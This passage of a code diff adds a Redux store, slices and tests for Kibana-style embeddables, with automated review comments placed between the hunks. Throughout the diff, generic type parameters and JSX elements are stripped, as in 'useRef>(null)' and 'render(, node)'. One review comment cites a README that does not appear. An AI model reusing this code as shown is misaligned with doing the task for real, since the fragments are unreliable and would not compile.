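Review bot: In the `@@ -93` hunk the `setLoading` effect lists `[embeddable, loading]` as its dependencies while the two new effects directly above it list `[embeddable.store, ...]`; all three dispatch on `embeddable.store`, so they should name the same dependency, `[embeddable.store, loading]`, for the exhaustive-deps lint rule and for readers. The removed `updateInput` call also refreshed `lastReloadRequestTime` whenever `title` or `viewMode` changed, and the replacement `setTitle`/`setViewMode` dispatches do not; if dropping that reload is intentional a short comment on the first new effect would save the next reader from re-deriving it. `HelloWorldEmbeddablePanel`'s body continues outside the hunk.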
@@ -230,7 +231,10 @@ interface DefaultWithErrorProps extends HelloWorldEmbeddablePanelProps {
 
 export function DefaultWithError({ message, ...props }: DefaultWithErrorProps) {
   const ref = useRef>(null);
-  useEffect(() => ref.current?.embeddable.updateOutput({ error: new Error(message) }), [message]);
+  useEffect(
+    () => void ref.current?.embeddable.store.dispatch(actions.output.setError(new Error(message))),
+    [message]
+  );
 
   return ;
 }
@@ -256,7 +260,10 @@ export function DefaultWithCustomError({ message, ...props }: DefaultWithErrorPr
     }),
     []
   );
-  useEffect(() => ref.current?.embeddable.updateOutput({ error: new Error(message) }), [message]);
+  useEffect(
+    () => void ref.current?.embeddable.store.dispatch(actions.output.setError(new Error(message))),
+    [message]
+  );
 
   return ;
 }
diff --git a/src/plugins/embeddable/public/__stories__/hello_world_embeddable.tsx b/src/plugins/embeddable/public/__stories__/hello_world_embeddable.tsx
index 2ea923704be77..5cf2c5fdc46e8 100644
--- a/src/plugins/embeddable/public/__stories__/hello_world_embeddable.tsx
+++ b/src/plugins/embeddable/public/__stories__/hello_world_embeddable.tsx
@@ -8,10 +8,15 @@
 
 import React from 'react';
 import { render } from 'react-dom';
+import { connect, Provider } from 'react-redux';
 import { EuiEmptyPrompt } from '@elastic/eui';
 import { Embeddable, IEmbeddable } from '..';
+import { createStore, State } from '../store';
 
 export class HelloWorldEmbeddable extends Embeddable {
+  // eslint-disable-next-line @kbn/eslint/no_this_in_property_initializers
+  readonly store = createStore(this);
+
   readonly type = 'hello-world';
 
   renderError: IEmbeddable['renderError'];
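Review bot: `actions.output.setError(new Error(message))` in the `@@ -230` hunk (and again in `@@ -256`) stores an `Error` instance in Redux state; the README on this page says `createStore` adds no middleware of its own, which leaves `configureStore`'s default serializability check in place, so in development every such dispatch is likely to log a non-serializable-value warning for `output.error`. Either `createStore` should be given `middleware` options that exclude that path (Redux Toolkit's `serializableCheck: { ignoredPaths: ['output.error'] }`), or the store-level convention for errors should be documented where `setError` is defined. The output type already carries an `Error` here (see the removed `updateOutput({ error: new Error(message) })`), so ignoring the path is the smaller change.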
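Review bot: In the `hello_world_embeddable.tsx` `@@ -8` hunk, `readonly store = createStore(this);` is a field initializer that runs after the `Embeddable` constructor but before the `type` field declared two lines below is assigned, so anything in `createStore` that reads `embeddable.type` at construction sees `undefined`; the `eslint-disable` for `no_this_in_property_initializers` silences exactly that class of ordering problem. If `createStore` only subscribes to `getInput$()`/`getOutput$()` this is harmless, but declaring `type` before `store` (or adding a comment stating that `createStore` does not read `type`) removes the doubt. The class body continues in the next hunk.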
@@ -19,16 +24,17 @@ export class HelloWorldEmbeddable extends Embeddable {
   reload() {}
 
   render(node: HTMLElement) {
-    render(, node);
-
-    this.reload = this.render.bind(this, node);
+    const App = connect((state: State) => ({ body: state.input.title }))(EuiEmptyPrompt);
+
+    render(
+      
+      ,
+      node
+    );
   }
 
   setErrorRenderer(renderer: IEmbeddable['renderError']) {
     this.renderError = renderer;
   }
-
-  updateOutput(...args: Parameters): void {
-    return super.updateOutput(...args);
-  }
 }
diff --git a/src/plugins/embeddable/public/lib/attribute_service/attribute_service.tsx b/src/plugins/embeddable/public/lib/attribute_service/attribute_service.tsx
index cb93ef13b918d..17a41e841abff 100644
--- a/src/plugins/embeddable/public/lib/attribute_service/attribute_service.tsx
+++ b/src/plugins/embeddable/public/lib/attribute_service/attribute_service.tsx
@@ -45,7 +45,7 @@ export interface AttributeServiceOptions<
     attributes: SavedObjectAttributes,
     savedObjectId?: string
   ) => Promise<{ id?: string } | { error: Error }>;
-  checkForDuplicateTitle: (props: OnSaveProps) => Promise;
+  checkForDuplicateTitle: (props: OnSaveProps) => Promise;
   unwrapMethod?: (
     savedObjectId: string
   ) => Promise>;
diff --git a/src/plugins/embeddable/public/lib/embeddables/embeddable.tsx b/src/plugins/embeddable/public/lib/embeddables/embeddable.tsx
index 001cb98afa6c1..94025320ec86d 100644
--- a/src/plugins/embeddable/public/lib/embeddables/embeddable.tsx
+++ b/src/plugins/embeddable/public/lib/embeddables/embeddable.tsx
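Review bot: `const App = connect(...)(EuiEmptyPrompt)` inside `render(node)` in the `@@ -19` hunk builds a new connected component type on every call, so a second `render` of the same node makes React unmount and remount the subtree instead of updating it; hoist it to module scope, `const App = connect((state: State) => ({ body: state.input.title }))(EuiEmptyPrompt);`, and keep only the `render(...)` call in the method. The removed `this.reload = this.render.bind(this, node)` also leaves `reload()` as the empty method at the top of the hunk, so the stories that dispatch `setLastReloadRequestTime` no longer trigger a re-render through `reload` — presumably the `connect` subscription now covers that, but a one-line comment on `reload() {}` saying so would avoid the question.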
@@ -41,8 +41,10 @@ export abstract class Embeddable<
   protected output: TEmbeddableOutput;
   protected input: TEmbeddableInput;
 
-  private readonly input$: Rx.BehaviorSubject;
-  private readonly output$: Rx.BehaviorSubject;
+  private readonly inputSubject = new Rx.ReplaySubject(1);
+  private readonly outputSubject = new Rx.ReplaySubject(1);
+  private readonly input$ = this.inputSubject.asObservable();
+  private readonly output$ = this.outputSubject.asObservable();
 
   protected renderComplete = new RenderCompleteDispatcher();
 
@@ -71,8 +73,8 @@ export abstract class Embeddable<
     };
     this.parent = parent;
 
-    this.input$ = new Rx.BehaviorSubject(this.input);
-    this.output$ = new Rx.BehaviorSubject(this.output);
+    this.inputSubject.next(this.input);
+    this.outputSubject.next(this.output);
 
     if (parent) {
       this.parentSubscription = Rx.merge(parent.getInput$(), parent.getOutput$()).subscribe(() => {
@@ -89,12 +91,7 @@ export abstract class Embeddable<
         map(({ title }) => title || ''),
         distinctUntilChanged()
       )
-      .subscribe(
-        (title) => {
-          this.renderComplete.setTitle(title);
-        },
-        () => {}
-      );
+      .subscribe((title) => this.renderComplete.setTitle(title));
   }
 
   public reportsEmbeddableLoad() {
@@ -142,11 +139,11 @@ export abstract class Embeddable<
   }
 
   public getInput$(): Readonly> {
-    return this.input$.asObservable();
+    return this.input$;
   }
 
   public getOutput$(): Readonly> {
-    return this.output$.asObservable();
+    return this.output$;
   }
 
   public getOutput(): Readonly {
@@ -238,8 +235,8 @@ export abstract class Embeddable<
   public destroy(): void {
     this.destroyed = true;
 
-    this.input$.complete();
-    this.output$.complete();
+    this.inputSubject.complete();
+    this.outputSubject.complete();
 
     if (this.parentSubscription) {
       this.parentSubscription.unsubscribe();
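Review bot: The `@@ -89` hunk drops the `() => {}` error callback from the title subscription, leaving `.subscribe((title) => this.renderComplete.setTitle(title))` with no error handler, while `onFatalError` in the next hunk still calls `this.outputSubject.error(e)`; in RxJS a subscriber without an error handler turns that into an unhandled error reported asynchronously instead of a quietly terminated subscription. If the chain feeding this `subscribe` is derived from `output$` (its start is outside the hunk), keep an explicit handler: `.subscribe({ next: (title) => this.renderComplete.setTitle(title), error: () => {} })`. Separately, the `@@ -41` hunk's switch from `BehaviorSubject` to `ReplaySubject(1)` changes what late subscribers see after `destroy()` calls `complete()` — a completed `ReplaySubject` still replays its last value, a completed `BehaviorSubject` only completes the subscriber — so a comment on the two subject fields stating that this is intended would help.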
@@ -257,20 +254,20 @@ export abstract class Embeddable<
     }
   }
 
-  protected updateOutput(outputChanges: Partial): void {
+  public updateOutput(outputChanges: Partial): void {
     const newOutput = {
       ...this.output,
       ...outputChanges,
     };
     if (!fastIsEqual(this.output, newOutput)) {
       this.output = newOutput;
-      this.output$.next(this.output);
+      this.outputSubject.next(this.output);
     }
   }
 
   protected onFatalError(e: Error) {
     this.fatalError = e;
-    this.output$.error(e);
+    this.outputSubject.error(e);
     // if the container is waiting for this embeddable to complete loading,
     // a fatal error counts as complete.
     if (this.deferEmbeddableLoad && this.parent?.isContainer) {
@@ -282,7 +279,7 @@ export abstract class Embeddable<
     if (!fastIsEqual(this.input, newInput)) {
       const oldLastReloadRequestTime = this.input.lastReloadRequestTime;
       this.input = newInput;
-      this.input$.next(newInput);
+      this.inputSubject.next(newInput);
       this.updateOutput({
         title: getPanelTitle(this.input, this.output),
       } as Partial);
diff --git a/src/plugins/embeddable/public/lib/embeddables/i_embeddable.ts b/src/plugins/embeddable/public/lib/embeddables/i_embeddable.ts
index 9037de1a10075..1c9bdebcefc9b 100644
--- a/src/plugins/embeddable/public/lib/embeddables/i_embeddable.ts
+++ b/src/plugins/embeddable/public/lib/embeddables/i_embeddable.ts
@@ -142,6 +142,12 @@ export interface IEmbeddable<
    */
   updateInput(changes: Partial): void;
 
+  /**
+   * Updates output state with the given changes.
+   * @param changes
+   */
+  updateOutput(changes: Partial): void;
+
   /**
    * Returns an observable which will be notified when input state changes.
    */
diff --git a/src/plugins/embeddable/public/store/create_store.test.ts b/src/plugins/embeddable/public/store/create_store.test.ts
new file mode 100644
index 0000000000000..52ac1eb32c8dc
--- /dev/null
+++ b/src/plugins/embeddable/public/store/create_store.test.ts
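Review bot: The new `updateOutput` TSDoc in the `i_embeddable.ts` hunk has an empty `@param changes` tag, and since the `@@ -257` hunk in `embeddable.tsx` promotes the method from `protected` to `public`, this comment is now the contract every consumer reads; it should state the merge semantics the implementation has: `@param changes Partial output merged over the current output; getOutput$() subscribers are notified only when the merged result differs.`. It is also worth saying which fields callers are expected to set, because with the method public any holder of the embeddable reference (a container, a UI action) can now overwrite `error`, `title` or `loading` directly and there is no validation of `changes`.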
@@ -0,0 +1,245 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +// eslint-disable-next-line max-classes-per-file +import { createAction, createReducer, createSlice, PayloadAction } from '@reduxjs/toolkit'; +import type { Store } from 'redux'; +import { + defaultEmbeddableFactoryProvider, + Container, + ContainerInput, + Embeddable, + EmbeddableInput, + EmbeddableOutput, +} from '../lib'; +import { createStore, State } from './create_store'; +import { input } from './input_slice'; +import { output } from './output_slice'; + +interface TestEmbeddableInput extends EmbeddableInput { + custom?: string; +} + +interface TestEmbeddableOutput extends EmbeddableOutput { + custom?: string; +} + +interface TestContainerInput extends ContainerInput { + custom?: string; +} + +class TestEmbeddable extends Embeddable { + type = 'test'; + reload = jest.fn(); + render = jest.fn(); +} + +class TestContainer extends Container, TestContainerInput> { + type = 'test'; + + getInheritedInput() { + return { + custom: this.input.custom, + }; + } +} + +describe('createStore', () => { + let embeddable: TestEmbeddable; + let store: Store>; + + beforeEach(() => { + embeddable = new TestEmbeddable({ id: '12345' }, { title: 'Test' }); + store = createStore(embeddable); + }); + + it('should populate the state with the embeddable input', () => { + expect(store.getState()).toHaveProperty('input', expect.objectContaining({ id: '12345' })); + }); + + it('should populate the state with the embeddable output', () => { + expect(store.getState()).toHaveProperty('output', expect.objectContaining({ title: 'Test' })); + }); + + it('should update the embeddable input on action dispatch', () => { + 
store.dispatch(input.actions.setTitle('Something')); + + expect(store.getState()).toHaveProperty('input.title', 'Something'); + }); + + it('should update the embeddable output on action dispatch', () => { + store.dispatch(output.actions.setTitle('Something')); + + expect(store.getState()).toHaveProperty('output.title', 'Something'); + }); + + it('should group input updates on multiple dispatch calls', async () => { + jest.spyOn(embeddable, 'updateInput'); + store.dispatch(input.actions.setTitle('Something')); + store.dispatch(input.actions.setHidePanelTitles(true)); + await new Promise((resolve) => setTimeout(resolve)); + + expect(embeddable.updateInput).toHaveBeenCalledTimes(1); + expect(embeddable.updateInput).nthCalledWith( + 1, + expect.objectContaining({ title: 'Something', hidePanelTitles: true }) + ); + }); + + it('should group output updates on multiple dispatch calls', async () => { + jest.spyOn(embeddable, 'updateOutput'); + store.dispatch(output.actions.setTitle('Something')); + store.dispatch(output.actions.setLoading(true)); + await new Promise((resolve) => setTimeout(resolve)); + + expect(embeddable.updateOutput).toHaveBeenCalledTimes(1); + expect(embeddable.updateOutput).nthCalledWith( + 1, + expect.objectContaining({ title: 'Something', loading: true }) + ); + }); + + it('should not update input on output changes', async () => { + jest.spyOn(embeddable, 'updateInput'); + store.dispatch(output.actions.setTitle('Something')); + await new Promise((resolve) => setTimeout(resolve)); + + expect(embeddable.updateInput).not.toHaveBeenCalled(); + }); + + it('should sync input changes', () => { + jest.spyOn(embeddable, 'updateInput'); + embeddable.updateInput({ title: 'Something' }); + + expect(embeddable.updateInput).toHaveBeenCalledTimes(1); + expect(store.getState()).toHaveProperty('input.title', 'Something'); + }); + + it('should sync output changes', () => { + jest.spyOn(embeddable, 'updateOutput'); + embeddable.updateOutput({ title: 'Something' }); + + 
expect(embeddable.updateOutput).toHaveBeenCalledTimes(1); + expect(store.getState()).toHaveProperty('output.title', 'Something'); + }); + + it('should provide a way to use a custom reducer', async () => { + const setCustom = createAction('custom'); + const customStore = createStore(embeddable, { + reducer: { + input: createReducer({} as TestEmbeddableInput, (builder) => + builder.addCase(setCustom, (state, action) => ({ ...state, custom: action.payload })) + ), + }, + }); + + jest.spyOn(embeddable, 'updateInput'); + customStore.dispatch(input.actions.setTitle('Something')); + customStore.dispatch(setCustom('Something else')); + await new Promise((resolve) => setTimeout(resolve)); + + expect(embeddable.updateInput).toHaveBeenCalledWith( + expect.objectContaining({ custom: 'Something else', title: 'Something' }) + ); + }); + + it('should provide a way to use a custom slice', async () => { + const slice = createSlice({ + name: 'test', + initialState: {} as State, + reducers: { + setCustom(state, action: PayloadAction) { + state.input.custom = action.payload; + state.output.custom = action.payload; + }, + }, + }); + const customStore = createStore(embeddable, { reducer: slice.reducer }); + + jest.spyOn(embeddable, 'updateInput'); + jest.spyOn(embeddable, 'updateOutput'); + customStore.dispatch(input.actions.setTitle('Something')); + customStore.dispatch(slice.actions.setCustom('Something else')); + await new Promise((resolve) => setTimeout(resolve)); + + expect(embeddable.updateInput).toHaveBeenCalledWith( + expect.objectContaining({ custom: 'Something else', title: 'Something' }) + ); + expect(embeddable.updateOutput).toHaveBeenCalledWith( + expect.objectContaining({ custom: 'Something else' }) + ); + }); + + describe('of a nested embeddable', () => { + const factory = defaultEmbeddableFactoryProvider< + TestEmbeddableInput, + TestEmbeddableOutput, + TestEmbeddable + >({ + type: 'test', + getDisplayName: () => 'Test', + isEditable: async () => true, + create: async 
(data, parent) => new TestEmbeddable(data, {}, parent), + }); + const getFactory = jest.fn().mockReturnValue(factory); + + let container: TestContainer; + + beforeEach(async () => { + container = new TestContainer( + { custom: 'something', id: 'id', panels: {} }, + { embeddableLoaded: {} }, + getFactory + ); + embeddable = (await container.addNewEmbeddable('test', { id: '12345' })) as TestEmbeddable; + store = createStore(embeddable); + }); + + it('should populate inherited input', () => { + expect(store.getState()).toHaveProperty('input.custom', 'something'); + }); + + it('should override inherited input on dispatch', async () => { + store.dispatch( + input.actions.update({ custom: 'something else' } as Partial) + ); + await new Promise((resolve) => setTimeout(resolve)); + + expect(store.getState()).toHaveProperty('input.custom', 'something else'); + expect(container.getInput()).toHaveProperty( + 'input.custom', + expect.not.stringMatching('something else') + ); + }); + + it('should restore value from the inherited input', async () => { + store.dispatch( + input.actions.update({ custom: 'something else' } as Partial) + ); + await new Promise((resolve) => setTimeout(resolve)); + store.dispatch(input.actions.update({ custom: undefined } as Partial)); + await new Promise((resolve) => setTimeout(resolve)); + + expect(store.getState()).toHaveProperty('input.custom', 'something'); + }); + + it('should not override inherited input on dispatch', async () => { + store.dispatch(input.actions.setTitle('Something')); + await new Promise((resolve) => setTimeout(resolve)); + container.updateInput({ custom: 'something else' }); + + expect(store.getState()).toHaveProperty( + 'input', + expect.objectContaining({ + title: 'Something', + custom: 'something else', + }) + ); + }); + }); +}); diff --git a/src/plugins/embeddable/public/store/create_store.ts b/src/plugins/embeddable/public/store/create_store.ts new file mode 100644 index 0000000000000..135f793c079dd --- /dev/null 
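Review bot: In `should override inherited input on dispatch` the assertion `expect(container.getInput()).toHaveProperty('input.custom', expect.not.stringMatching('something else'))` uses the key path `input.custom`, but the container input built in `beforeEach` has `custom` at the top level with no `input` key, so the path never resolves; depending on the Jest version this either fails outright or, because `not.stringMatching` accepts `undefined`, passes without checking anything. The intent appears to be that the child's override does not leak upward into the container, which `expect(container.getInput()).toHaveProperty('custom', 'something');` would pin exactly. The `await new Promise((resolve) => setTimeout(resolve))` idiom repeated through the file exists to flush the `debounceTime(0)` in `createStore`; a small named helper such as `const flushDebounce = () => new Promise((resolve) => setTimeout(resolve));` would make that reason visible.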
+++ b/src/plugins/embeddable/public/store/create_store.ts 
@@ -0,0 +1,132 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { chain, isEmpty, keys } from 'lodash'; +import { combineReducers, Reducer, Store, ReducersMapObject } from 'redux'; +import { configureStore, ConfigureStoreOptions } from '@reduxjs/toolkit'; +import { + debounceTime, + distinctUntilChanged, + filter, + last, + map, + pluck, + share, + takeUntil, + Observable, +} from 'rxjs'; +import reduceReducers from 'reduce-reducers'; +import type { Optional } from 'utility-types'; +import type { IEmbeddable } from '../lib'; +import { input } from './input_slice'; +import { output } from './output_slice'; + +export interface State { + input: E extends IEmbeddable ? I : never; + output: E extends IEmbeddable ? O : never; +} + +export interface CreateStoreOptions + extends Omit, 'reducer'> { + reducer?: Reducer | Optional, keyof State>; +} + +function createReducer( + reducer?: CreateStoreOptions['reducer'] +): Reducer | ReducersMapObject { + if (reducer instanceof Function) { + const generic = combineReducers>({ + input: input.reducer, + output: output.reducer, + }) as Reducer; + + return reduceReducers(generic, reducer) as Reducer; + } + + return { + ...(reducer ?? {}), + input: reducer?.input ? reduceReducers(input.reducer, reducer.input) : input.reducer, + output: reducer?.output ? 
reduceReducers(output.reducer, reducer.output) : output.reducer, + } as ReducersMapObject; +} + +function diff>(previous: T, current: T) { + return chain(current) + .keys() + .concat(keys(previous)) + .uniq() + .filter((key) => previous[key] !== current[key]) + .map((key) => [key, current[key]]) + .fromPairs() + .value() as Partial; +} + +/** + * Creates a Redux store for the given embeddable. + * @param embeddable The embeddable instance. + * @param options The custom options to pass to the `configureStore` call. + * @returns The Redux store. + */ +export function createStore = State>( + embeddable: E, + { preloadedState, reducer, ...options }: CreateStoreOptions = {} +): Store { + const store = configureStore({ + ...options, + preloadedState: { + input: embeddable.getInput(), + output: embeddable.getOutput(), + ...(preloadedState ?? {}), + } as NonNullable, + reducer: createReducer(reducer), + }); + + const state$ = new Observable((subscriber) => { + subscriber.add(store.subscribe(() => subscriber.next(store.getState()))); + }).pipe(share()); + const input$ = embeddable.getInput$(); + const output$ = embeddable.getOutput$(); + + state$ + .pipe( + takeUntil(input$.pipe(last())), + pluck('input'), + distinctUntilChanged(), + map((value) => diff(embeddable.getInput(), value)), + filter((patch) => !isEmpty(patch)), + debounceTime(0) + ) + .subscribe((patch) => embeddable.updateInput(patch)); + + state$ + .pipe( + takeUntil(output$.pipe(last())), + pluck('output'), + distinctUntilChanged(), + map((value) => diff(embeddable.getOutput(), value)), + filter((patch) => !isEmpty(patch)), + debounceTime(0) + ) + .subscribe((patch) => embeddable.updateOutput(patch)); + + input$ + .pipe( + map((value) => diff(store.getState().input, value)), + filter((patch) => !isEmpty(patch)) + ) + .subscribe((patch) => store.dispatch(input.actions.update(patch))); + + output$ + .pipe( + map((value) => diff(store.getState().output, value)), + filter((patch) => !isEmpty(patch)) + ) + 
.subscribe((patch) => store.dispatch(output.actions.update(patch))); + + return store; +} diff --git a/packages/shared-ux/button/exit_full_screen/mocks/jest.config.js b/src/plugins/embeddable/public/store/index.ts similarity index 57% rename from packages/shared-ux/button/exit_full_screen/mocks/jest.config.js rename to src/plugins/embeddable/public/store/index.ts index 3485a061a38ee..05567e0215589 100644 --- a/packages/shared-ux/button/exit_full_screen/mocks/jest.config.js +++ b/src/plugins/embeddable/public/store/index.ts @@ -6,8 +6,12 @@ * Side Public License, v 1. */ -module.exports = { - preset: '@kbn/test/jest_node', - rootDir: '../../../../..', - roots: ['/packages/shared-ux/button/exit_full_screen/mocks'], +import { input } from './input_slice'; +import { output } from './output_slice'; + +export type { CreateStoreOptions, State } from './create_store'; +export { createStore } from './create_store'; +export const actions = { + input: input.actions, + output: output.actions, }; diff --git a/src/plugins/embeddable/public/store/input_slice.ts b/src/plugins/embeddable/public/store/input_slice.ts new file mode 100644 index 0000000000000..da4bc6618ae11 --- /dev/null +++ b/src/plugins/embeddable/public/store/input_slice.ts 
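Review bot: None of the four subscriptions in `createStore` supplies an error callback, yet `Embeddable.onFatalError`, changed in this same commit, calls `this.outputSubject.error(e)`; when that fires, both `takeUntil(output$.pipe(last()))` and the trailing `output$` subscription propagate the error to observers that only define `next`, so a fatal error in the embeddable surfaces as an unhandled RxJS error rather than being reflected in the store. Consider giving the `output$` → store branch an explicit observer, e.g. `.subscribe({ next: (patch) => store.dispatch(output.actions.update(patch)), error: (error) => store.dispatch(output.actions.setError(error)) })` if `EmbeddableOutput.error` accepts the value, and extend the `createStore` docblock to say that synchronisation stops when the embeddable's input/output streams complete (the `takeUntil(... last())` guards) while the store itself is never torn down. The `diff` helper compares by reference (`previous[key] !== current[key]`), which is fine for immer-produced state but worth a one-line comment, since a caller-supplied reducer that rebuilds unchanged nested objects would produce spurious patches and extra `updateInput`/`updateOutput` calls.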
@@ -0,0 +1,56 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { createSlice, PayloadAction } from '@reduxjs/toolkit'; +import type { EmbeddableInput } from '../lib'; + +export const input = createSlice({ + name: 'input', + initialState: {} as EmbeddableInput, + reducers: { + setDisabledActions(state, action: PayloadAction) { + state.disabledActions = action.payload; + }, + setDisableTriggers(state, action: PayloadAction) { + state.disableTriggers = action.payload; + }, + setEnhancements(state, action: PayloadAction) { + state.enhancements = action.payload; + }, + setExecutionContext(state, action: PayloadAction) { + state.executionContext = action.payload; + }, + setHidePanelTitles(state, action: PayloadAction) { + state.hidePanelTitles = action.payload; + }, + setLastReloadRequestTime( + state, + action: PayloadAction + ) { + state.lastReloadRequestTime = action.payload; + }, + setSearchSessionId(state, action: PayloadAction) { + state.searchSessionId = action.payload; + }, + setSyncColors(state, action: PayloadAction) { + state.syncColors = action.payload; + }, + setSyncTooltips(state, action: PayloadAction) { + state.syncTooltips = action.payload; + }, + setTitle(state, action: PayloadAction) { + state.title = action.payload; + }, + setViewMode(state, action: PayloadAction) { + state.viewMode = action.payload; + }, + update(state, action: PayloadAction>) { + return { ...state, ...action.payload }; + }, + }, +}); diff --git a/src/plugins/embeddable/public/store/output_slice.ts b/src/plugins/embeddable/public/store/output_slice.ts new file mode 100644 index 0000000000000..c3cbaf6875893 --- /dev/null 
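Review bot: `initialState: {} as EmbeddableInput` asserts that an empty object satisfies `EmbeddableInput`, hiding that required fields (at least `id`, judging by the `{ id: '12345' }` fixtures in the tests) are absent; the slice only works because `createStore` always preloads the real input, and that dependency is unstated. A comment on the line, `// Placeholder only: createStore always preloads the embeddable's real input, so this empty state is never observed.`, would make the contract explicit. The `update` reducer spreads the payload over the state, so a key explicitly set to `undefined` clears that key (the nested-embeddable tests rely on this to restore inherited values), and that merge semantic deserves a short docblock on `update`. The same two points apply to `output_slice.ts` in the next hunk.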
+++ b/src/plugins/embeddable/public/store/output_slice.ts @@ -0,0 +1,50 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { createSlice, PayloadAction } from '@reduxjs/toolkit'; +import type { EmbeddableOutput } from '../lib'; + +export const output = createSlice({ + name: 'output', + initialState: {} as EmbeddableOutput, + reducers: { + setLoading(state, action: PayloadAction) { + state.loading = action.payload; + }, + setRendered(state, action: PayloadAction) { + state.rendered = action.payload; + }, + setError(state, action: PayloadAction) { + state.error = action.payload; + }, + setEditUrl(state, action: PayloadAction) { + state.editUrl = action.payload; + }, + setEditApp(state, action: PayloadAction) { + state.editApp = action.payload; + }, + setEditPath(state, action: PayloadAction) { + state.editPath = action.payload; + }, + setDefaultTitle(state, action: PayloadAction) { + state.defaultTitle = action.payload; + }, + setTitle(state, action: PayloadAction) { + state.title = action.payload; + }, + setEditable(state, action: PayloadAction) { + state.editable = action.payload; + }, + setSavedObjectId(state, action: PayloadAction) { + state.savedObjectId = action.payload; + }, + update(state, action: PayloadAction>) { + return { ...state, ...action.payload }; + }, + }, +}); diff --git a/src/plugins/es_ui_shared/static/forms/hook_form_lib/hooks/use_form.ts b/src/plugins/es_ui_shared/static/forms/hook_form_lib/hooks/use_form.ts index b6b45c76e7115..95ed985bf1a2f 100644 --- a/src/plugins/es_ui_shared/static/forms/hook_form_lib/hooks/use_form.ts +++ b/src/plugins/es_ui_shared/static/forms/hook_form_lib/hooks/use_form.ts 
@@ -8,7 +8,7 @@ import { useState, useRef, useEffect, useMemo, useCallback } from 'react'; import { get, mergeWith } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { FormHook, FieldHook, FormData, FieldsMap, FormConfig } from '../types'; import { diff --git a/src/plugins/es_ui_shared/static/forms/hook_form_lib/lib/utils.ts b/src/plugins/es_ui_shared/static/forms/hook_form_lib/lib/utils.ts index 54f6726abb115..fe41de2947795 100644 --- a/src/plugins/es_ui_shared/static/forms/hook_form_lib/lib/utils.ts +++ b/src/plugins/es_ui_shared/static/forms/hook_form_lib/lib/utils.ts @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { FieldHook } from '../types'; interface GenericObject { diff --git a/src/plugins/home/public/application/components/guided_onboarding/getting_started.tsx b/src/plugins/home/public/application/components/guided_onboarding/getting_started.tsx index b5415064eea17..9f27a0194a3ca 100644 --- a/src/plugins/home/public/application/components/guided_onboarding/getting_started.tsx +++ b/src/plugins/home/public/application/components/guided_onboarding/getting_started.tsx @@ -21,7 +21,7 @@ import { import { css } from '@emotion/react'; import { METRIC_TYPE } from '@kbn/analytics'; import { i18n } from '@kbn/i18n'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { getServices } from '../../kibana_services'; import { KEY_ENABLE_WELCOME } from '../home'; diff --git a/src/plugins/interactive_setup/public/use_form.ts b/src/plugins/interactive_setup/public/use_form.ts index abd00edee6750..47768400dd775 100644 --- a/src/plugins/interactive_setup/public/use_form.ts +++ b/src/plugins/interactive_setup/public/use_form.ts 
@@ -6,12 +6,13 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; import { cloneDeep, cloneDeepWith, get } from 'lodash'; import type { ChangeEventHandler, FocusEventHandler, ReactEventHandler } from 'react'; import { useState } from 'react'; import useAsyncFn from 'react-use/lib/useAsyncFn'; +import { set } from '@kbn/safer-lodash-set'; + export type FormReturnTuple = [FormState, FormProps]; export interface FormProps { diff --git a/src/plugins/kibana_overview/public/components/overview/overview.test.tsx b/src/plugins/kibana_overview/public/components/overview/overview.test.tsx index 99d8b45cdf27b..0fbedc5c3367e 100644 --- a/src/plugins/kibana_overview/public/components/overview/overview.test.tsx +++ b/src/plugins/kibana_overview/public/components/overview/overview.test.tsx @@ -13,16 +13,16 @@ import { act } from 'react-dom/test-utils'; import { ReactWrapper } from 'enzyme'; import { EuiLoadingSpinner } from '@elastic/eui'; import { mountWithIntl } from '@kbn/test-jest-helpers'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import type { FeatureCatalogueCategory } from '@kbn/home-plugin/public'; import { AnalyticsNoDataPageKibanaProvider } from '@kbn/shared-ux-page-analytics-no-data'; import { hasESData, hasUserDataView } from './overview.test.mocks'; import { Overview } from './overview'; -jest.mock('@kbn/shared-ux-components', () => { +jest.mock('@kbn/shared-ux-page-kibana-template', () => { const MockedComponent: string = 'MockedKibanaPageTemplate'; const mockedModule = { - ...jest.requireActual('@kbn/shared-ux-components'), + ...jest.requireActual('@kbn/shared-ux-page-kibana-template'), KibanaPageTemplate: () => { return ; }, diff --git a/src/plugins/kibana_overview/public/components/overview/overview.tsx b/src/plugins/kibana_overview/public/components/overview/overview.tsx index 738b278b17b36..245fcb12c7afd 100644 
